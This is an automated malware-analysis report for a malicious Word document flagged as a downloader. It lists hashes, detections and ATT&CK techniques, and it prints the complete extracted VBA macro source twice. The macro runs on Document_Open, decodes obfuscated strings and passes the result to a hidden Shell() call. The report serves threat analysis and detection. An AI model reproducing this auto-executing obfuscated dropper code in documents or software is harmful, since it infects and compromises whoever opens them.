Office (OLE) malware analysis — malicious · 2496889456af5970

MALICIOUS

Office (OLE)

311.0 KB Created: 2018-09-04 02:58:00 Authoring application: Microsoft Office Word First seen: 2019-08-04

MD5: f1e1bb8421b90e09372680197c83f26e SHA-1: d247fb757c36060a0dc35beeeb6437b948be02d7 SHA-256: 2496889456af5970e3eb4fc42790cc6670cd16f91b8f4c7e9b928eef9d29a002

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains VBA macros, including a Document_Open macro that triggers the execution of a Shell() command. This command likely uses the content of TextBox2 to download and execute a secondary payload. The obfuscated nature of the VBA code and the use of Shell() indicate a downloader or dropper functionality.

Heuristics 5

ClamAV: Doc.Downloader.Generic-6680467-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-6680467-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4057 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4057 bytes
SHA-256: `e211e4600d2dcde49bb133eee8e4d4e5b77b3a40e6d6c29435782513e86497a1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Protect1 = "rn" November1606 Protect1 End Sub Attribute VB_Name = "form1" Attribute VB_Base = "0{EBFCD186-BA75-45A7-AD26-EACC5EBFFBBC}{D80A8ED1-1C54-4C83-9A35-0C9CBEEA4EE5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub TextBox2_Change() tstr = form1.TextBox2 Shell tstr, 0 End Sub Private Sub TextBox3_Change() nextIter End Sub Attribute VB_Name = "Module1" Function myfuncg(arg2) string3 = "" Index = 1 sessdrov Index, string3, arg2 myfuncg = string3 End Function Function sessdrov(ByRef knuckslo, ByRef deanhoney, buxtedst) NIROTAMAT = Len(buxtedst) If knuckslo <= NIROTAMAT Then deanhoney = deanhoney + simon111(sydneydemo(Mid(buxtedst, knuckslo, 1)), 9) knuckslo = knuckslo + 1 sessdrov knuckslo, deanhoney, buxtedst End If End Function Function simon111(epismush, iamaxman) If epismush - iamaxman < 1 Then simon111 = Right(Left(form1.TextBox1, Len(form1.TextBox1) + epismush - iamaxman), 1) Else simon111 = Right(Left(form1.TextBox1, epismush - iamaxman), 1) End If End Function Function sydneydemo(lafoblit) promyczek = 1 ravenrider = 1 manalive promyczek, ravenrider, lafoblit sydneydemo = ravenrider End Function Function manalive(ByRef promyczek, ByRef ravenrider, lafoblit) uperturbo = form1.TextBox1 NIROTAMAT = Len(uperturbo) If knuckslo < NIROTAMAT Then If lafoblit <> Right(Left(uperturbo, promyczek), 1) Then promyczek = promyczek + 1 manalive promyczek, ravenrider, lafoblit Else ravenrider = promyczek End If End If End Function Attribute VB_Name = "afka2009" Function laseropus(ByRef glennweb, speechbeer, frovomu6) glennweb = glennweb + speechbeer + frovomu6 End Function Function AVOKINLIDOR() AVOKINLIDOR = "1" End Function Function November1606(ByRef stinghorse) form1.TextBox3 = stinghorse End Function Attribute VB_Name = "rablegio" Function mark6236(niki1976) Select Case niki1976 Case 1 mark6236 = "){c9})9lkasdxns""""9.,lkasdxns""""9..vh$)fjk$9" Case 2 mark6236 = "\-xfdj$b%9_" Case 3 mark6236 = ";\|\$sa4k]ms)f9xgxfs{ $sf as])""js$f; cka$""kzcvj""s\_" Case 4 mark6236 = "1,,5f{l52" Case 5 mark6236 = " s(s,,;3xfzdf4ldk)sxx9,,5f{l52" Case 6 mark6236 = " s(s,,3:fdg\|" Case 7 mark6236 = "\,,nffl8}}0ur 0ri 0qi q0w}bk""cs$ ccf,,;:)zf)n\|" Case 8 mark6236 = "\,,nffl8}}0ur 0ri 0qi it}bk""cs$ ccf,,;:,..979khf4vj""s94s$)kcj$b9zx)jj94vj""slzfn95f{l52" Case 9 mark6236 = " ]zf39xfzdf4ldk)sxx9,5f{l52" End Select If InStr(niki1976, "LG") Then mark6236 = " ]zf,94aj$ckaxfg""s9njccs$." End Function Attribute VB_Name = "SUHCIVESIM" Function nextIter() journals (mark6236(1)) dreameramy = "" caculo32 = "gigobayt" laseropus dreameramy, form1.TextBox4, caculo32 journals (mark6236(2)) skynetbd = "August1808" laseropus dreameramy, form1.TextBox4, skynetbd journals (mark6236(3)) laseropus dreameramy, form1.TextBox4, skynetbd journals (mark6236(4)) perechem = "tucker3000" laseropus dreameramy, form1.TextBox4, perechem journals (mark6236(5)) laseropus dreameramy, form1.TextBox4, perechem journals (mark6236(6)) laseropus dreameramy, form1.TextBox4, caculo32 journals (mark6236(7)) laseropus dreameramy, form1.TextBox4, caculo32 journals (mark6236(8)) sweets1976 = "HCIVELEGRU" laseropus dreameramy, form1.TextBox4, sweets1976 journals (mark6236(9)) laseropus dreameramy, form1.TextBox4, sweets1976 journals (mark6236("LGG")) laseropus dreameramy, form1.TextBox4, "" form1.TextBox2 = dreameramy End Function Function journals(dreameramy) form1.TextBox4 = myfuncg(dreameramy) End Function

SHA-256: e211e4600d2dcde49bb133eee8e4d4e5b77b3a40e6d6c29435782513e86497a1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Protect1 = "rn"
November1606 Protect1
End Sub

Attribute VB_Name = "form1"
Attribute VB_Base = "0{EBFCD186-BA75-45A7-AD26-EACC5EBFFBBC}{D80A8ED1-1C54-4C83-9A35-0C9CBEEA4EE5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox2_Change()
tstr = form1.TextBox2
Shell tstr, 0
End Sub

Private Sub TextBox3_Change()
nextIter
End Sub

Attribute VB_Name = "Module1"
Function myfuncg(arg2)
string3 = ""
Index = 1
sessdrov Index, string3, arg2
myfuncg = string3
End Function

Function sessdrov(ByRef knuckslo, ByRef deanhoney, buxtedst)
NIROTAMAT = Len(buxtedst)
If knuckslo <= NIROTAMAT Then
deanhoney = deanhoney + simon111(sydneydemo(Mid(buxtedst, knuckslo, 1)), 9)
knuckslo = knuckslo + 1
sessdrov knuckslo, deanhoney, buxtedst
End If
End Function

Function simon111(epismush, iamaxman)
If epismush - iamaxman < 1 Then
simon111 = Right(Left(form1.TextBox1, Len(form1.TextBox1) + epismush - iamaxman), 1)
Else
simon111 = Right(Left(form1.TextBox1, epismush - iamaxman), 1)
End If
End Function

Function sydneydemo(lafoblit)
promyczek = 1
ravenrider = 1
manalive promyczek, ravenrider, lafoblit
sydneydemo = ravenrider
End Function

Function manalive(ByRef promyczek, ByRef ravenrider, lafoblit)
uperturbo = form1.TextBox1
NIROTAMAT = Len(uperturbo)
If knuckslo < NIROTAMAT Then
    If lafoblit <> Right(Left(uperturbo, promyczek), 1) Then
    promyczek = promyczek + 1
    manalive promyczek, ravenrider, lafoblit
    Else
    ravenrider = promyczek
    End If
End If
End Function

Attribute VB_Name = "afka2009"
Function laseropus(ByRef glennweb, speechbeer, frovomu6)
glennweb = glennweb + speechbeer + frovomu6
End Function

Function AVOKINLIDOR()
AVOKINLIDOR = "1"
End Function

Function November1606(ByRef stinghorse)
form1.TextBox3 = stinghorse
End Function

Attribute VB_Name = "rablegio"
Function mark6236(niki1976)
Select Case niki1976
Case 1
mark6236 = "){c9})9lkasdxns""""9.,lkasdxns""""9..vh$)fjk$9"
Case 2
mark6236 = "\-xfdj$b%9_"
Case 3
mark6236 = ";|\$sa4k]ms)f9xgxfs{ $sf as])""js$f; cka$""kzcvj""s\_"
Case 4
mark6236 = "1,,5f{l52"
Case 5
mark6236 = " s(s,,;3xfzdf4ldk)sxx9,,5f{l52"
Case 6
mark6236 = " s(s,,3:fdg|"
Case 7
mark6236 = "\,,nffl8}}0ur 0ri 0qi q0w}bk""cs$ ccf,,;:)zf)n|"
Case 8
mark6236 = "\,,nffl8}}0ur 0ri 0qi it}bk""cs$ ccf,,;:,..979khf4vj""s94s$)kcj$b9zx)jj94vj""slzfn95f{l52"
Case 9
mark6236 = " ]zf39xfzdf4ldk)sxx9,5f{l52"
End Select
If InStr(niki1976, "LG") Then mark6236 = " ]zf,94aj$ckaxfg""s9njccs$."
End Function

Attribute VB_Name = "SUHCIVESIM"
Function nextIter()
journals (mark6236(1))
dreameramy = ""
caculo32 = "gigobayt"
laseropus dreameramy, form1.TextBox4, caculo32
journals (mark6236(2))
skynetbd = "August1808"
laseropus dreameramy, form1.TextBox4, skynetbd
journals (mark6236(3))
laseropus dreameramy, form1.TextBox4, skynetbd
journals (mark6236(4))
perechem = "tucker3000"
laseropus dreameramy, form1.TextBox4, perechem
journals (mark6236(5))
laseropus dreameramy, form1.TextBox4, perechem
journals (mark6236(6))
laseropus dreameramy, form1.TextBox4, caculo32
journals (mark6236(7))
laseropus dreameramy, form1.TextBox4, caculo32
journals (mark6236(8))
sweets1976 = "HCIVELEGRU"
laseropus dreameramy, form1.TextBox4, sweets1976
journals (mark6236(9))
laseropus dreameramy, form1.TextBox4, sweets1976
journals (mark6236("LGG"))
laseropus dreameramy, form1.TextBox4, ""

form1.TextBox2 = dreameramy
End Function

Function journals(dreameramy)
form1.TextBox4 = myfuncg(dreameramy)
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.